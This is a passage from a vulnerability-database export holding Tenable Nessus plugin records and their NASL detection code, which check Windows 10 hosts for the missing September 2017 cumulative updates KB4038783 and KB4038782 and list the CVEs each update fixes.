vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8660, CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8738, CVE-2017-8752, CVE-2017-8753,\n CVE-2017-8755, CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-09-12T00:00:00", "title": "KB4038783: Windows 10 Version 1511 September 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8681", "CVE-2017-8643", "CVE-2017-8713", "CVE-2017-8741", "CVE-2017-8757", "CVE-2017-8707", "CVE-2017-8695", "CVE-2017-8756", "CVE-2017-8682", "CVE-2017-0161", "CVE-2017-8719", "CVE-2017-8737", "CVE-2017-8699", "CVE-2017-8753", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8709", "CVE-2017-8683", "CVE-2017-8752", "CVE-2017-8678", "CVE-2017-8628", "CVE-2017-8754", "CVE-2017-8735", "CVE-2017-8738", "CVE-2017-8728", "CVE-2017-8677", "CVE-2017-11766", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8679", "CVE-2017-8660", "CVE-2017-8687", "CVE-2017-8734", "CVE-2017-8759", "CVE-2017-8676", "CVE-2017-8708", "CVE-2017-8688", "CVE-2017-8720", "CVE-2017-8692", "CVE-2017-8706", "CVE-2017-8702", "CVE-2017-8736", "CVE-2017-8529", "CVE-2017-8733", "CVE-2017-8755", "CVE-2017-8675", "CVE-2017-8723"], "modified": "2017-09-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038783.NASL", "href": "https://www.tenable.com/plugins/nessus/103129", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103129);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/28\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8628\",\n \"CVE-2017-8643\",\n \"CVE-2017-8660\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8702\",\n \"CVE-2017-8706\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8713\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8723\",\n \"CVE-2017-8728\",\n \"CVE-2017-8733\",\n \"CVE-2017-8734\",\n \"CVE-2017-8735\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8738\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n \"CVE-2017-8752\",\n \"CVE-2017-8753\",\n \"CVE-2017-8754\",\n \"CVE-2017-8755\",\n \"CVE-2017-8756\",\n \"CVE-2017-8757\",\n \"CVE-2017-8759\",\n \"CVE-2017-11766\"\n );\n script_xref(name:\"MSKB\", value:\"4038783\");\n script_xref(name:\"MSFT\", value:\"MS17-4038783\");\n\n script_name(english:\"KB4038783: Windows 10 Version 1511 September 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038783.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights.(CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system.\n (CVE-2017-8683)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. \n (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system.\n (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. (CVE-2017-8699)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality.\n (CVE-2017-8702)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8713)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system.(CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights.(CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.(CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8660, CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8738, CVE-2017-8752, CVE-2017-8753,\n CVE-2017-8755, CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038783/windows-10-update-kb4038783\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?15cd901b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4038783.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038783');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038783])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:59", "description": "The remote Windows host is missing security update 4038782.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights.(CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system.(CVE-2017-8683)\n\n - A memory corruption vulnerability exists in the Windows\n Server DHCP service when an attacker sends specially\n crafted packets to a DHCP failover server. An attacker\n who successfully exploited the vulnerability could\n either run arbitrary code on the DHCP failover server or\n cause the DHCP service to become nonresponsive.\n (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object.(CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability.(CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. If the current user is logged on with\n administrative user rights, an attacker could take\n control of the affected system.\n (CVE-2017-8699)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality.\n (CVE-2017-8702)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system.\n input. (CVE-2017-8704)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8711,\n CVE-2017-8712, CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM\n Host Agent Service of Remote Desktop Virtual Host role\n when it fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights.(CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8731, CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session.(CVE-2017-8746)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649, CVE-2017-8660, CVE-2017-8741,\n CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user.(CVE-2017-8750)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-11764, CVE-2017-8738, CVE-2017-8752,\n CVE-2017-8753, CVE-2017-8755, CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system.\n (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-09-12T00:00:00", "title": "KB4038782: Windows 10 Version 1607 and Windows Server 2016 September 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8704", "CVE-2017-8746", "CVE-2017-8681", "CVE-2017-8643", "CVE-2017-8713", "CVE-2017-8741", "CVE-2017-8757", "CVE-2017-8707", "CVE-2017-8695", "CVE-2017-8756", "CVE-2017-8731", "CVE-2017-8682", "CVE-2017-11764", "CVE-2017-0161", "CVE-2017-8719", "CVE-2017-8737", "CVE-2017-8699", "CVE-2017-8753", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8709", "CVE-2017-8683", "CVE-2017-8752", "CVE-2017-8678", "CVE-2017-8628", "CVE-2017-8754", "CVE-2017-8735", "CVE-2017-8738", "CVE-2017-8714", "CVE-2017-8728", "CVE-2017-8686", "CVE-2017-8677", "CVE-2017-11766", "CVE-2017-8649", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8679", "CVE-2017-8660", "CVE-2017-8687", "CVE-2017-8734", "CVE-2017-8711", "CVE-2017-8759", "CVE-2017-8676", "CVE-2017-8708", "CVE-2017-8688", "CVE-2017-8720", "CVE-2017-8692", "CVE-2017-8706", "CVE-2017-8702", "CVE-2017-8712", "CVE-2017-8736", "CVE-2017-8529", "CVE-2017-8733", "CVE-2017-8755", "CVE-2017-8675", "CVE-2017-8723"], "modified": "2017-09-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038782.NASL", "href": "https://www.tenable.com/plugins/nessus/103128", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103128);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/28\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8628\",\n \"CVE-2017-8643\",\n \"CVE-2017-8649\",\n \"CVE-2017-8660\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8686\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8702\",\n \"CVE-2017-8704\",\n \"CVE-2017-8706\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8711\",\n \"CVE-2017-8712\",\n \"CVE-2017-8713\",\n \"CVE-2017-8714\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8723\",\n \"CVE-2017-8728\",\n \"CVE-2017-8731\",\n \"CVE-2017-8733\",\n \"CVE-2017-8734\",\n \"CVE-2017-8735\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8738\",\n \"CVE-2017-8741\",\n \"CVE-2017-8746\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n \"CVE-2017-8752\",\n \"CVE-2017-8753\",\n \"CVE-2017-8754\",\n \"CVE-2017-8755\",\n \"CVE-2017-8756\",\n \"CVE-2017-8757\",\n \"CVE-2017-8759\",\n 